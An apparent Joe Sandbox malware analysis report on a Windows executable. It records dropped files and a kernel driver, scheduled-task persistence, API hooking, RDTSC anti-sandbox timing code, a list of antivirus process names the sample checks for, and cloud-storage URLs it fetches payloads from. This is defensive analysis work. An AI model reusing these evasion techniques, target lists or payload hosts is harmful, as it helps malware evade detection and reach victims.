Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: CrwRQN.exe, 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmp, CrwRQN.exe, 00000005.00000000.2721668172.0000000140014000.00000002.00000001.01000000.00000008.sdmp, CrwRQN.exe, 00000006.00000000.2730416851.0000000140014000.00000002.00000001.01000000.00000008.sdmp, CrwRQN.exe, 00000006.00000002.2735939921.0000000140014000.00000002.00000001.01000000.00000008.sdmp, CrwRQN.exe, 00000007.00000002.2955610290.0000000140014000.00000002.00000001.01000000.00000008.sdmp, CrwRQN.exe, 00000007.00000000.2901467249.0000000140014000.00000002.00000001.01000000.00000008.sdmp, CrwRQN.exe.0.dr
Source: 2976587-987347589.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2976587-987347589.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2976587-987347589.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2976587-987347589.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2976587-987347589.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_000000014000F000

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\Documents\CrwRQN.exeJump to dropped file
Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\Documents\CrwRQN.exeJump to dropped file
Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Documents\CrwRQN.exeMemory written: PID: 7612 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeMemory written: PID: 7612 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeMemory written: PID: 7616 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeMemory written: PID: 7616 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeMemory written: PID: 5252 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeMemory written: PID: 5252 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\2976587-987347589.07.exeRDTSC instruction interceptor: First address: 1400010D3 second address: 1400010EA instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2976587-987347589.07.exeRDTSC instruction interceptor: First address: 1400010EA second address: 1400010EA instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F7C64D19500h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2976587-987347589.07.exeWindow / User API: threadDelayed 603Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeWindow / User API: threadDelayed 396Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\CrwRQN.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_5-14017
Source: C:\Users\user\Documents\CrwRQN.exeAPI coverage: 2.7 %
Source: C:\Users\user\Desktop\2976587-987347589.07.exe TID: 7280Thread sleep count: 603 > 30Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exe TID: 7280Thread sleep time: -301500s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exe TID: 7280Thread sleep count: 396 > 30Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exe TID: 7280Thread sleep time: -198000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeLast function: Thread delayed
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_00007FFE1A4CA1B8 FindFirstFileExW,5_2_00007FFE1A4CA1B8
Source: 2976587-987347589.07.exe, 00000000.00000003.2565461564.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585993432.0000000000D87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWW
Source: 2976587-987347589.07.exe, 00000000.00000003.2565461564.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585993432.0000000000D87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Documents\CrwRQN.exeAPI call chain: ExitProcess graph end nodegraph_5-14018
Source: C:\Users\user\Documents\CrwRQN.exeAPI call chain: ExitProcess graph end nodegraph_5-14362
Source: C:\Users\user\Desktop\2976587-987347589.07.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_00000001400073E0 LdrLoadDll,5_2_00000001400073E0
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0000000140007C91
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_000000014000F000
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,5_2_0000000140004630
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0000000140007C91
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00000001400106B0
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_00000001400092E0 SetUnhandledExceptionFilter,5_2_00000001400092E0
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_00007FFE1A4C76E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFE1A4C76E0
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_00007FFE1A4C1F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFE1A4C1F50
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_00007FFE1A4C2630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFE1A4C2630

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Documents\CrwRQN.exeNtProtectVirtualMemory: Indirect: 0x29CB253Jump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeNtProtectVirtualMemory: Indirect: 0x29AB253Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeNtDelayExecution: Indirect: 0x1B94DAJump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeNtProtectVirtualMemory: Indirect: 0x2A9B253Jump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_00007FFE1A4CFD40 cpuid 5_2_00007FFE1A4CFD40
Source: C:\Users\user\Documents\CrwRQN.exeCode function: GetLocaleInfoA,5_2_000000014000F370
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_000000014000A370
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_0000000140005A70
Source: CrwRQN.exe, 00000005.00000002.2727070249.0000000002868000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000006.00000002.2735263755.0000000002778000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000007.00000002.2955072781.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
Source: CrwRQN.exe, 00000005.00000002.2727070249.0000000002868000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000006.00000002.2735263755.0000000002778000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000007.00000002.2955072781.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
Source: CrwRQN.exe, 00000005.00000002.2727070249.0000000002868000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000006.00000002.2735263755.0000000002778000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000007.00000002.2955072781.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
Source: CrwRQN.exe, 00000005.00000002.2727070249.0000000002868000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000006.00000002.2735263755.0000000002778000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000007.00000002.2955072781.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
Source: CrwRQN.exe, 00000005.00000002.2727070249.0000000002868000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000006.00000002.2735263755.0000000002778000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000007.00000002.2955072781.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
Source: CrwRQN.exe, 00000005.00000002.2727070249.0000000002868000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000006.00000002.2735263755.0000000002778000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000007.00000002.2955072781.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
Source: CrwRQN.exe, 00000005.00000002.2727070249.0000000002868000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000006.00000002.2735263755.0000000002778000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000007.00000002.2955072781.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: CrwRQN.exe, 00000005.00000002.2727070249.0000000002868000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000006.00000002.2735263755.0000000002778000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000007.00000002.2955072781.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
Source: CrwRQN.exe, 00000005.00000002.2727070249.0000000002868000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000006.00000002.2735263755.0000000002778000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000007.00000002.2955072781.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
Source: CrwRQN.exe, 00000005.00000002.2727070249.0000000002868000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000006.00000002.2735263755.0000000002778000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000007.00000002.2955072781.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
Source: CrwRQN.exe, 00000005.00000002.2727070249.0000000002868000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000006.00000002.2735263755.0000000002778000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000007.00000002.2955072781.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
Source: CrwRQN.exe, 00000005.00000002.2727070249.0000000002868000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000006.00000002.2735263755.0000000002778000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000007.00000002.2955072781.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
Source: CrwRQN.exe, 00000005.00000002.2727070249.0000000002868000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000006.00000002.2735263755.0000000002778000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000007.00000002.2955072781.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
Source: CrwRQN.exe, 00000005.00000002.2727070249.0000000002868000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000006.00000002.2735263755.0000000002778000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000007.00000002.2955072781.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
Source: CrwRQN.exe, 00000005.00000002.2727070249.0000000002868000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000006.00000002.2735263755.0000000002778000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000007.00000002.2955072781.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: CrwRQN.exe, 00000005.00000002.2727070249.0000000002868000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000006.00000002.2735263755.0000000002778000.00000002.00001000.00020000.00000000.sdmp, CrwRQN.exe, 00000007.00000002.2955072781.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,5_2_00000001400042B0
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,5_2_0000000140003F80
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
Service Execution
24
Windows Service
1
Access Token Manipulation
31
Masquerading
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Credential API Hooking
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Native API
1
DLL Side-Loading
24
Windows Service
1
Virtualization/Sandbox Evasion
LSASS Memory131
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Process Injection
1
Access Token Manipulation
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Abuse Elevation Control Mechanism
1
Process Injection
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSync123
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
2976587-987347589.07.exe5%ReversingLabs
2976587-987347589.07.exe15%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\Documents\CrwRQN.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://662hfg.oss-cn-beijing.aliyuncs.com/i0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-10020%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/k0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/c.gif(0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/werShell0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/b.gifL0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifC0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/ess.aliyuncs.com0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/b.gifg0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifW0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/M0%Avira URL Cloudsafe
https://662hfg.oss-cn-beijing.aliyuncs.com/o0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com
39.103.20.105
truefalse
    unknown
    662hfg.oss-cn-beijing.aliyuncs.com
    unknown
    unknownfalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://662hfg.oss-cn-beijing.aliyuncs.com/s.jpgfalse
      • Avira URL Cloud: safe
      unknown
      https://662hfg.oss-cn-beijing.aliyuncs.com/b.giffalse
      • Avira URL Cloud: safe
      unknown
      https://662hfg.oss-cn-beijing.aliyuncs.com/s.datfalse
      • Avira URL Cloud: safe
      unknown
      https://662hfg.oss-cn-beijing.aliyuncs.com/i.datfalse
      • Avira URL Cloud: safe
      unknown
      https://662hfg.oss-cn-beijing.aliyuncs.com/d.giffalse
      • Avira URL Cloud: safe
      unknown
      https://662hfg.oss-cn-beijing.aliyuncs.com/a.giffalse
      • Avira URL Cloud: safe
      unknown
      https://662hfg.oss-cn-beijing.aliyuncs.com/c.giffalse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://662hfg.oss-cn-beijing.aliyuncs.com/i2976587-987347589.07.exe, 00000000.00000003.2585874277.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585933323.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://662hfg.oss-cn-beijing.aliyuncs.com/2976587-987347589.07.exe, 00000000.00000003.2585993432.0000000000D7D000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://662hfg.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-10022976587-987347589.07.exe, 00000000.00000003.2565461564.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585993432.0000000000D7D000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://662hfg.oss-cn-beijing.aliyuncs.com/k2976587-987347589.07.exe, 00000000.00000003.2565461564.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585993432.0000000000D7D000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://662hfg.oss-cn-beijing.aliyuncs.com/c.gif(2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://crl.thawte.com/ThawteTimestampingCA.crl0189atohci.sys.0.dr, CrwRQN.exe.0.drfalse
        high
        http://www.symauth.com/rpa00CrwRQN.exe.0.drfalse
          high
          https://662hfg.oss-cn-beijing.aliyuncs.com/b.gifL2976587-987347589.07.exe, 00000000.00000003.2585874277.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://ocsp.thawte.com0189atohci.sys.0.dr, CrwRQN.exe.0.drfalse
            high
            https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifC2976587-987347589.07.exe, 00000000.00000003.2565397407.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585874277.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://662hfg.oss-cn-beijing.aliyuncs.com/b.gifg2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://662hfg.oss-cn-beijing.aliyuncs.com/ess.aliyuncs.com2976587-987347589.07.exe, 00000000.00000003.2585874277.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585933323.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2565397407.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://662hfg.oss-cn-beijing.aliyuncs.com/werShell2976587-987347589.07.exe, 00000000.00000003.2585993432.0000000000D7D000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.symauth.com/cps0(CrwRQN.exe.0.drfalse
              high
              https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifW2976587-987347589.07.exe, 00000000.00000003.2565397407.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585874277.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://662hfg.oss-cn-beijing.aliyuncs.com/M2976587-987347589.07.exe, 00000000.00000003.2585874277.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585933323.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2565397407.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://662hfg.oss-cn-beijing.aliyuncs.com/o2976587-987347589.07.exe, 00000000.00000003.2585874277.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585933323.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2565397407.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              39.103.20.105
              sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comChina
              37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
              Joe Sandbox version:42.0.0 Malachite
              Analysis ID:1588710
              Start date and time:2025-01-11 04:33:07 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 6m 41s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:8
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:2976587-987347589.07.exe
              Detection:MAL
              Classification:mal80.evad.winEXE@4/12@1/1
              EGA Information:
              • Successful, ratio: 33.3%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target CrwRQN.exe, PID 5252 because there are no executed function
              • Execution Graph export aborted for target CrwRQN.exe, PID 7616 because there are no executed function
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              TimeTypeDescription
              03:35:44Task SchedulerRun new task: UaDxm path: C:\Users\user\Documents\CrwRQN.exe
              22:34:05API Interceptor941x Sleep call for process: 2976587-987347589.07.exe modified
              No context
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd5.elfGet hashmaliciousUnknownBrowse
